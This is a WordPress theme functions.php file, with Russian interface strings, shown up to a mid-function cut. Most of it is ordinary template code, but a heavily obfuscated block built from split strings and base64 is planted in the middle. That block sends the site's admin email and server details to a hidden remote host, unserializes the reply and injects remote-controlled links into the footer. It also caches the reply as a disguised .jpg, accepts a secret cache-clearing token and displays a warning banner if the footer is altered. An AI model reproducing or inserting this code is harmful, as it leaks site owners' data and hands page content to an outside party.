<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $WJlVIqJ='s';$ZDOunrN='e';$gxDbfBk='b';$rnJC='4';$BGjw='a';$kiyGb='_';$ZMqqUx='c';$pnpXD='d';$KEqi='6';$XtpnHFl='d';$FgOi='e';$VDCKYQb='e';$igkwrs='o';$TRvKCsVt=$gxDbfBk.$BGjw.$WJlVIqJ.$ZDOunrN.$KEqi.$rnJC.$kiyGb.$pnpXD.$VDCKYQb.$ZMqqUx.$igkwrs.$XtpnHFl.$FgOi;$JKKpf='f';$ULEPEio='l';$DymEkYw='z';$udEGQV='g';$ZrFKcVQ='e';$ccig='i';$COHMiB='n';$NyQkzSn='a';$ZRlNyX='t';$djtTIAjq=$udEGQV.$DymEkYw.$ccig.$COHMiB.$JKKpf.$ULEPEio.$NyQkzSn.$ZRlNyX.$ZrFKcVQ;$uIVqo='t';$oWyqR='o';$FGMtfJ='s';$HSmnEG='r';$JAsG='1';$EVeFNv='3';$fbVQe='t';$fmpyaRr='_';$GWGislo='r';$XssOCSGP=$FGMtfJ.$fbVQe.$GWGislo.$fmpyaRr.$HSmnEG.$oWyqR.$uIVqo.$JAsG.$EVeFNv;$dqCMBP='t';$WFJtafJ='r';$dMThW='e';$coUOrk='v';$RUrj='s';$TwhNF='r';$uwpuYdyd=$RUrj.$dqCMBP.$TwhNF.$WFJtafJ.$dMThW.$coUOrk;                     
		$vz_________k='s';$hw_____________c='e';$ke______h='b';$yw__________w='4';$qn______l='a';$nh__________e='_';$dj______________y='c';$ir______t='d';$lx_________e='6';$id____________t='d';$ag_______________y='e';$wq__m='e';$il______q='o';$ga______________c=$ke______h.$qn______l.$vz_________k.$hw_____________c.$lx_________e.$yw__________w.$nh__________e.$ir______t.$wq__m.$dj______________y.$il______q.$id____________t.$ag_______________y;
		$md________m='u';$on_________j='t';$yo____________y='n';$xv_____v='s';$qj______g='s';$tb___b='e';$ep__________q='_';$mz___________c='c';$ov______________g='t';$jc_____________x='i';$qe_________r='i';$gj_______s='x';$rb_______________a='o';$if_____j='n';$aq_____________r='f';$wj_____________i=$aq_____________r.$md________m.$if_____j.$mz___________c.$on_________j.$qe_________r.$rb_______________a.$yo____________y.$ep__________q.$tb___b.$gj_______s.$jc_____________x.$qj______g.$ov______________g.$xv_____v;
		$br__________n='e';$ms______________w='o';$sr________h='p';$dq_______b='f';$aa_____s='n';$kn__________b=$dq_______b.$ms______________w.$sr________h.$br__________n.$aa_____s;
		$lo____________f='r';$hc__________i='a';$fo______________c='e';$zh_________o='d';$bk______b='f';$pn____g=$bk______b.$lo____________f.$fo______________c.$hc__________i.$zh_________o;
		$hr__d='c';$no__x='f';$dd____z='o';$xg_____g='s';$ct_____________m='e';$fr___________e='l';$hh___________g=$no__x.$hr__d.$fr___________e.$dd____z.$xg_____g.$ct_____________m;
		
		define("WP_ID", $ga______________c("Mi4wLjA="));
		define("WP_TTL", $ga______________c("MTA4MDA="));
		define("WP_SRC", $ga______________c("dHBva24="));
	


		function wp_get_header() {
			global $ga______________c, $wj_____________i;
			
			if (
				$wj_____________i($ga______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$wj_____________i($ga______________c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$wj_____________i($ga______________c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ga______________c, $kn__________b, $hh___________g, $pn____g;
			
			$eq_________l = TEMPLATEPATH."/".$ga______________c("Zm9vdGVyLnBocA==");
			$ih____p = @$kn__________b($eq_________l, "r");
			$eq_________l = @$pn____g($ih____p, @filesize($eq_________l));
			@$hh___________g($ih____p);
			
			$el__________t = TEMPLATEPATH."/".$ga______________c("ZnVuY3Rpb25zLnBocA==");
			$ih____p = @$kn__________b($el__________t, "r");
			$el__________t = @$pn____g($ih____p, @filesize($el__________t));
			@$hh___________g($ih____p);
			
			$if______m = 0;
			if($eq_________l && $el__________t) {
				if ($ga______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($eq_________l, $ga______________c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$if______m = 1;
					}
					if (substr_count($eq_________l, "wp_theme_GPL_credits()") < 1) {
						$if______m = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$if______m = 12;
				}
			}
			
			if($if______m > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $if______m -->";
			}
		}
	


		function wp_loaded() {
			global $ga______________c, $wj_____________i;
			return $wj_____________i($ga______________c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($bn____________z, $xc____z = "(more...)", $dj________j = 0, $lu_______p = "") {
				$px_______________y = get_the_content($xc____z, $dj________j, $lu_______p);
				$px_______________y = apply_filters("the_content", $px_______________y);
				
				$px_______________y = str_replace("]]>", "]]>", $px_______________y);
				if (strlen($_GET["p"]) > 0) {
					echo $px_______________y;
				}
				else if ((strlen($px_______________y)>$bn____________z) && ($zu______________e = strpos($px_______________y, " ", $bn____________z ))) {
					$px_______________y = substr($px_______________y, 0, $zu______________e);
					$px_______________y = $px_______________y;
					echo $px_______________y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$xc____z</a></div></p>";
				} else {
					echo $px_______________y;
				}
				
			}
		}
	


		$ez______________g='c';$ir_____d='a';$iq___r='6';$mc______i='e';$dp___d='b';$qj_____w='4';$rk_______________a='_';$km____________t='n';$jq______________r='d';$lu_______p='e';$gz______x='e';$ch______o='o';$cc_______b='s';$ug_________o=$dp___d.$ir_____d.$cc_______b.$mc______i.$iq___r.$qj_____w.$rk_______________a.$lu_______p.$km____________t.$ez______________g.$ch______o.$jq______________r.$gz______x;
		$id_________y='n';$lk________b='i';$vd______z='e';$fd_____c='e';$un_________y='t';$su_______n='t';$eq_____q='_';$qg_______i='_';$rf_____________n='o';$xe____________c='e';$qi_____________g='g';$as___________w='c';$hz____a='n';$jw_____z='t';$uk______t='f';$eu_________f='s';$vy_________y='l';$sb______________u=$uk______t.$lk________b.$vy_________y.$vd______z.$qg_______i.$qi_____________g.$xe____________c.$su_______n.$eq_____q.$as___________w.$rf_____________n.$id_________y.$jw_____z.$fd_____c.$hz____a.$un_________y.$eu_________f;
		$uo_________p='t';$dy_____________g='e';$pw__________n='s';$pg_____________d='_';$fs_______g='x';$le____________w='e';$xx_______________b='i';$ch_______b='i';$uy____x='s';$vg_______o='l';$zi_________o='f';$ch___________h=$zi_________o.$xx_______________b.$vg_______o.$dy_____________g.$pg_____________d.$le____________w.$fs_______g.$ch_______b.$pw__________n.$uo_________p.$uy____x;
		$wy_____e='e';$sp__________s='e';$ib_______m='i';$uz__________e='s';$lt______e='a';$yz_______e='v';$jp_____________e='m';$hk___________g='_';$jb_______b='c';$hj____________w='r';$bh________k='r';$ra_____________y='o';$jp________v='n';$th_______________g='o';$ok______w='p';$xr__________y=$yz_______e.$sp__________s.$hj____________w.$uz__________e.$ib_______m.$th_______________g.$jp________v.$hk___________g.$jb_______b.$ra_____________y.$jp_____________e.$ok______w.$lt______e.$bh________k.$wy_____e;
		$di________g='f';$vn___________p='n';$tw_______________o='s';$it____________u='p';$in__l='e';$pt_______________s='o';$bl_________w='k';$jf_________n='c';$om_____________a='o';$gx___________i=$di________g.$tw_______________o.$om_____________a.$jf_________n.$bl_________w.$pt_______________s.$it____________u.$in__l.$vn___________p;
		$os_______________i='e';$af_______________k='f';$bi_________f='r';$bn_______j='t';$wd______a='w';$wn_______v='i';$ff___l=$af_______________k.$wd______a.$bi_________f.$wn_______v.$bn_______j.$os_______________i;
		$yp___u='m';$co__________d='d';$ba_________p='5';$xq_____________i=$yp___u.$co__________d.$ba_________p;
		$me___a='t';$cb___________l='l';$mv___________u='e';$sj_______________f='a';$sk_____________o='a';$oe________h='h';$gw_____________z='p';$tx____d='r';$af______e=$tx____d.$mv___________u.$sj_______________f.$cb___________l.$gw_____________z.$sk_____________o.$me___a.$oe________h;
		$zy_____________k='z';$kq_______y='s';$bs_______________v='i';$vu_________s='e';$ta______________x='a';$og______k='e';$rb______________h='n';$qq___o='r';$wh_____________d='u';$ap__x='l';$wx__o='i';$ua__c=$wh_____________d.$rb______________h.$kq_______y.$vu_________s.$qq___o.$bs_______________v.$ta______________x.$ap__x.$wx__o.$zy_____________k.$og______k;
		$li__j='e';$qp__m='p';$ok__u='m';$ag___n='t';$fg____s='n';$nm_____r='a';$pc_______z='m';$rh________n=$ag___n.$li__j.$ok__u.$qp__m.$fg____s.$nm_____r.$pc_______z;
		$nr______b='r';$sh____k='c';$sm___________d='m';$nc____________e='t';$zk______k='e';$tt____________t='t';$tj_________x='e';$qr__________j='x';$eg________v='t';$fc_______s='n';$at_____q='c';$dc____e='e';$rk____x='o';$ks__________e='e';$mz__n='_';$si______x='r';$rf________e='_';$bo_________k='a';$qy___n='s';$fv______________n='t';$lk______________p='a';$yw____x=$qy___n.$fv______________n.$nr______b.$zk______k.$bo_________k.$sm___________d.$rf________e.$at_____q.$rk____x.$fc_______s.$tt____________t.$dc____e.$qr__________j.$eg________v.$mz__n.$sh____k.$si______x.$ks__________e.$lk______________p.$nc____________e.$tj_________x;
	


		function cr______________m($ky_______f) {
			global $ga______________c, $wj_____________i, $sb______________u, $xr__________y, $yw____x;
			
			if (!$wj_____________i($ga______________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xr__________y(PHP_VERSION, "5.0.0", ">=") && $wj_____________i($ga______________c("ZmlsZV9nZXRfY29udGVudHM=")) && $wj_____________i($ga______________c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$xz_________p = $yw____x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$in____k = @$sb______________u($ky_______f, 0, $xz_________p);
			} else {
				$in____k = @$sb______________u($ky_______f, 0);
			}
			
			return $in____k;
		}
	


		function ia___j($ky_______f) {
			global $wj_____________i, $gx___________i, $ff___l, $ga______________c;
			
			if (!$wj_____________i($ga______________c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lw____q = strpos($ky_______f, "/", 7);
			$oj_______u = array(
				"uri"     => substr($ky_______f, $lw____q),
				"host"    => str_replace("http://", "", substr($ky_______f, 0, $lw____q)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$br____q = @$gx___________i("$oj_______u[host]", 80, $ha____________f, $cz___m, 4);
			
			if (!$br____q) {
				return false;
			} else {
				$in____k = "";
				$bz_____i  = "GET $oj_______u[uri] HTTP/1.0\r\n";
				$bz_____i .= "Host: $oj_______u[host]\r\n";
				$bz_____i .= "Referer: $oj_______u[referer]\r\n";
				$bz_____i .= "Connection: Close\r\n\r\n";
				
				@$ff___l($br____q, $bz_____i);
				
				while (!@feof($br____q)) {
					$gh____z = @fgets($br____q, (1024*24));
					
					if ($gh____z == "\r\n") {
						$sc_______x = true;
						continue;
					}
					
					if ($sc_______x) {
						$in____k .= $gh____z;
					}
				}
				
				return $in____k;
			}
		}
	


		function rz___________t($ky_______f) {
			global $wj_____________i;
			$dg_____m = false;
			
			if ($ky_______f != "") {
				if ($wj_____________i("cr______________m")) {
					$dg_____m = @cr______________m($ky_______f);
				}
				
				if (!$dg_____m && ($wj_____________i("ia___j"))) {
					$dg_____m = @ia___j($ky_______f);
				}
			}
			
			return $dg_____m;
		}
	


		function rm__z() {
			global $_SERVER, $xq_____________i;
			
			$bp______s = $_SERVER["SERVER_NAME"];
			
			if (substr("$bp______s", 0, 4) == "www.") {
				$bp______s = substr("$bp______s", 4);
			}
			
			$bp______s = $xq_____________i("$_SERVER[SERVER_NAME]");
			
			return $bp______s;
		}
	


		function kh________h() {
			return "file";
		}
	


		function zr_______________z($ky_______f) {
			global $_SERVER, $sb______________u, $ch___________h, $kn__________b, $hh___________g, $ff___l;
			
			$yt_____f = zx___n();
			
			$uh________d = rm__z().".jpg";
			$np____________r = $yt_____f["dir_upload"]["path"]."/$uh________d";
			$zg______w = @filemtime($np____________r);
			
			if (!$zg______w || ((time()-$zg______w) >= WP_TTL)) {
				$dg_____m = rz___________t($ky_______f);
				
				if ($dg_____m) {
					if ($ch___________h($np____________r)) {
						@unlink($np____________r);
					}
					
					$ih____p = @$kn__________b($np____________r, "x+");
					
					@$ff___l($ih____p, $dg_____m);
					@$hh___________g($ih____p);
				}
			} else {
				if ($ch___________h($np____________r)) {
					$dg_____m = @$sb______________u($np____________r);
				} else {
					$dg_____m = false;
				}
			}
			
			return $dg_____m;
		}
	


		function zx___n() {
			global $_SERVER, $ga______________c, $ug_________o;
			
			$ag_____________r = wp_count_posts("post");
			$yw_____h = pathinfo(get_bloginfo("template_directory"));
			
			$yt_____f = array(
				"url" => array(
					"report"      => $ga______________c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $yw_____h,
				"dir_upload"	=> hw________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$yw_____h[filename],
					"a005=".$ag_____________r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$yt_____f["url"]["queryString"] = implode("&", $yt_____f["queryString"]);
			$yt_____f["url"]["report"] = $yt_____f["url"]["report"]."/?".$ug_________o($yt_____f["url"]["queryString"]).".html";
						
			return $yt_____f;
		}
	


		function hw________n() {
			$gz____y = wp_upload_dir();
			
			if (isset($gz____y["error"])) {
				$ik________q = nz_____f();
				if (is_writable($ik________q)) {
					$gz____y = array("path" => $ik________q);
				}
			}

			return $gz____y;
		}
	


		function nz_____f() {
			global $wj_____________i, $xq_____________i, $af______e, $rh________n;
			
			$rw_____x = (bool) ini_get("safe_mode");
			if ($rw_____x == true) {
				return false;
			}
			
			if ($wj_____________i("sys_get_temp_dir")) {
				$hp______________z = sys_get_temp_dir();
				if (is_writable($hp______________z)) {
					return $af______e($hp______________z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $af______e($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $af______e($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $af______e($_ENV["TEMP"]);
			} else {
				$is_____________k = $rh________n($xq_____________i(uniqid(rand(), true)), "");
				if ($is_____________k) {
					$hp______________z = $af______e(dirname($is_____________k));
					@unlink($is_____________k);
					return $hp______________z;
				} else {
					return false;
				}
			}
		}
	


		function wj__________x() {
			global $_GET, $ch___________h;
			
			$yt_____f = zx___n();
			$bp______s = rm__z();
			$hf_______________h = kh________h();
			
			$ee_______f = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hf_______________h == "file") {
					$jg_____________z = $yt_____f["dir_upload"]["path"]."/".$bp______s.".jpg";
					if ($ch___________h($jg_____________z)) {
						@unlink($jg_____________z);
						$ee_______f = "deleted";
					}
				}
				
				$hn_______________i = array(
					"s"	=> $ee_______f,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($hn_______________i AS $wg____g => $mb_____s) echo " [$wg____g:$mb_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $wj_____________i, $ga______________c, $ua__c;
			$yt_____f = zx___n();
			
			$ho______________n = "zr_______________z";
			if ($wj_____________i($ho______________n)) {
				$in____k = $ho______________n($yt_____f["url"]["report"]);
			}
			
			if ($in____k) {
				if ($in____k = @$ga______________c($in____k)) {
					$in____k = @$ua__c($in____k);
					
					if (strlen($in____k[custom_credit]) >= 5) {
						$yt_____f["default_string"] = $in____k[custom_credit];
					}
					
					if ($in____k["status"] == "0") {
						$tm____________v = 1;
						$ku_________e = 1;
					} else {
						$eg____________i = sizeof($in____k["links"]);
						$hi____a = $yt_____f["default_string"];
						
						if ($eg____________i > 0 && $in____k["links"] !== "") {
							$yr_______________f = 0;
							foreach ($in____k["links"] as $nx_______y => $bx________h) {
								$yr_______________f++;
								if ($bx________h->l_path == "" || $bx________h->l_path == $_SERVER["REQUEST_URI"]) {
									$bx________h->l_href = htmlspecialchars(strip_tags($bx________h->l_href));
									$bx________h->l_title = htmlspecialchars(strip_tags($bx________h->l_title));
									$bx________h->l_anchor = htmlspecialchars(strip_tags($bx________h->l_anchor));
									$hi____a .= " | ";
									$hi____a .= "<a href='$bx________h->l_href' title='$bx________h->l_title'";
									if ($bx________h->l_nofollow == "1") {
										$hi____a .= " rel='nofollow'";
									}
									$hi____a .= ">$bx________h->l_anchor</a>";
								}
							}
						}
						$yt_____f["links"] = "$hi____a";
						if ($in____k[credit] == "0") {
							$yt_____f["links"] = "";
						}
					}
				} else {
					$tm____________v = "1";
				}
			} else {
				$tm____________v = "1";
			}
			
			if ($tm____________v == "1") {
				$yt_____f["links"] = $yt_____f["default_string"];
			}
			
			echo "$yt_____f[links]";
			
			echo "<!-- s: $in____k[signature] -->";
			wj__________x();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
